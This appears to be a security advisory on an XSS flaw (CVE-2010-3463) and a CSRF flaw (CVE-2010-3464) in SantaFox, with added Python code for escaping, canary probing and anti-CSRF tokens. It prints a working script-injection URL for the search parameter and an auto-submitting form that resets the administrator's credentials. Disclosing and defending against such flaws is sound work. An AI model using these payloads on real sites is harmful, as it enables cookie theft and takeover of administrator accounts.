High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SantaFox which could be exploited to perform cross-site scripting and cross-site request forgery attacks.
Cross-site scripting (XSS) vulnerability in SantaFox: CVE-2010-3463
The vulnerability exists due to an input sanitization error in the "search" parameter in modules/search/search.class.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim be logged in to the application and have access to the administrative interface.
Exploitation example:
http://host/search.html?search=1"><script>alert(document.cookie)</script>&x=0&y=0
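The following Python snippet is an added illustration and not SantaFox code: it reproduces why the payload above executes and shows the attribute-context escaping that neutralizes it. It assumes (the advisory does not say) that search.class.php reflects the raw "search" value into an <input value="..."> attribute, which is what the payload's leading `1">` break-out sequence is built for. The render_* functions are stand-ins for that behaviour, and is_reflected_unescaped() is a canary-based check a tester can point at a real instance by supplying a fetch callable.

```python
"""Added example, not SantaFox code: why the search payload fires and how
attribute-context escaping stops it.  Assumption: the vulnerable template
reflects the raw ``search`` value inside an <input value="..."> attribute."""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# The advisory's exploitation URL, verbatim.
PAYLOAD_URL = ('http://host/search.html?search=1"><script>'
               'alert(document.cookie)</script>&x=0&y=0')


def search_param(url):
    """Return the decoded ``search`` query parameter of ``url``."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("search", [""])[0]


def render_vulnerable(term):
    """Stand-in for the flawed behaviour: the term is interpolated raw."""
    return '<input type="text" name="search" value="%s">' % term


def render_fixed(term):
    """Hardened form: escape for the attribute context, quotes included."""
    return '<input type="text" name="search" value="%s">' % html.escape(term, quote=True)


def contains_script_tag(page):
    """Crude detector: is there a live <script> element in the markup?"""
    return "<script>" in page.lower()


def is_reflected_unescaped(fetch, base_url="http://host/search.html"):
    """Probe a search endpoint with a harmless canary instead of a live
    payload.  ``fetch(url) -> str`` is supplied by the caller (for example a
    wrapper around an HTTP client).  The canary survives verbatim only if
    the application fails to escape the double quote and angle brackets."""
    canary = 'hb"><hb7>'
    url = base_url + "?" + urlencode({"search": canary, "x": "0", "y": "0"})
    return canary in fetch(url)
```

Run against the vulnerable stand-in (`is_reflected_unescaped(lambda u: render_vulnerable(search_param(u)))`) the probe returns True, and against the escaped version it returns False. The canary avoids executing anything on the target while still proving the attribute break-out that the real payload relies on.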
Cross-site request forgery (CSRF) in SantaFox: CVE-2010-3464
The vulnerability exists due to insufficient validation of the request origin in admin/index.php. A remote attacker can create a specially crafted page (such as the auto-submitting form below), trick a logged-in administrator into visiting it, and change the administrator's credentials with the administrator's own session.
Exploitation example:
<!-- auto-submitting form: the victim's browser attaches the admin session cookie to the POST -->
<form action="http://host/admin/index.php?action=set_left_menu&leftmenu=save_admin&id=-1" method="post" name="main">
<input type="hidden" name="login" value="Admin" />
<input type="hidden" name="full_name" value="Admin" />
<input type="hidden" name="pass" value="Admin" />
<input type="hidden" name="lang" value="en" />
<input type="hidden" name="codepage" value="" />
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="select_group[1]" value="on" />
<input type="hidden" name="select_group[2]" value="on" />
</form>
<script>
document.main.submit();
</script>
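The following is an added example, not SantaFox code, of the server-side check the advisory says admin/index.php lacks. It is written in Python to show the logic rather than the project's PHP: a per-session HMAC token that an attacker's page cannot read, plus an Origin/Referer check as defense in depth, evaluated against the POST body the form above produces. SITE_ORIGIN, the session identifier argument and the csrf_token form field are assumed names.

```python
"""Added example, not SantaFox code: anti-CSRF gate for the save_admin action.
Assumed names: SITE_ORIGIN, ``session_id`` (the victim's session identifier)
and the ``csrf_token`` form field."""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://host"              # scheme + host of the real site (assumed)
SERVER_SECRET = secrets.token_bytes(32)  # generated at start-up for this demo


def csrf_token(session_id):
    """Derive a token bound to the victim's session.  A third-party page has
    no way to read it, so the forged form above cannot include it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def origin_allowed(headers):
    """Defense in depth: browsers attach Origin to cross-site POSTs, so a
    request naming another origin, or none at all, is refused."""
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False  # fail closed on state-changing requests
    parts = urlsplit(origin)
    return "%s://%s" % (parts.scheme, parts.netloc) == SITE_ORIGIN


def save_admin_allowed(session_id, headers, form):
    """Gate for action=set_left_menu&leftmenu=save_admin: both checks must pass."""
    if not origin_allowed(headers):
        return False
    presented = form.get("csrf_token", "")
    return hmac.compare_digest(presented, csrf_token(session_id))


# Constructed sample: the POST body the advisory's auto-submitting form produces.
FORGED_FORM = {
    "login": "Admin", "full_name": "Admin", "pass": "Admin", "lang": "en",
    "codepage": "", "enabled": "on", "select_group[1]": "on", "select_group[2]": "on",
}
# Constructed sample: headers the victim's browser sends from the attacker's page.
FORGED_HEADERS = {"Origin": "http://attacker.example", "Cookie": "PHPSESSID=victim"}


def legitimate_request(session_id):
    """Headers and body the site's own admin form would send."""
    form = dict(FORGED_FORM, csrf_token=csrf_token(session_id))
    return {"Origin": SITE_ORIGIN, "Cookie": "PHPSESSID=" + session_id}, form
```

The token is the primary control; the Origin/Referer comparison is a second layer and should not be relied on alone, since proxies and referrer policies can strip Referer while a forged token can never be supplied by a cross-origin page. The forged request is rejected even when the attacker's form is otherwise identical to the legitimate one, and a request with the right token but from another session is rejected as well.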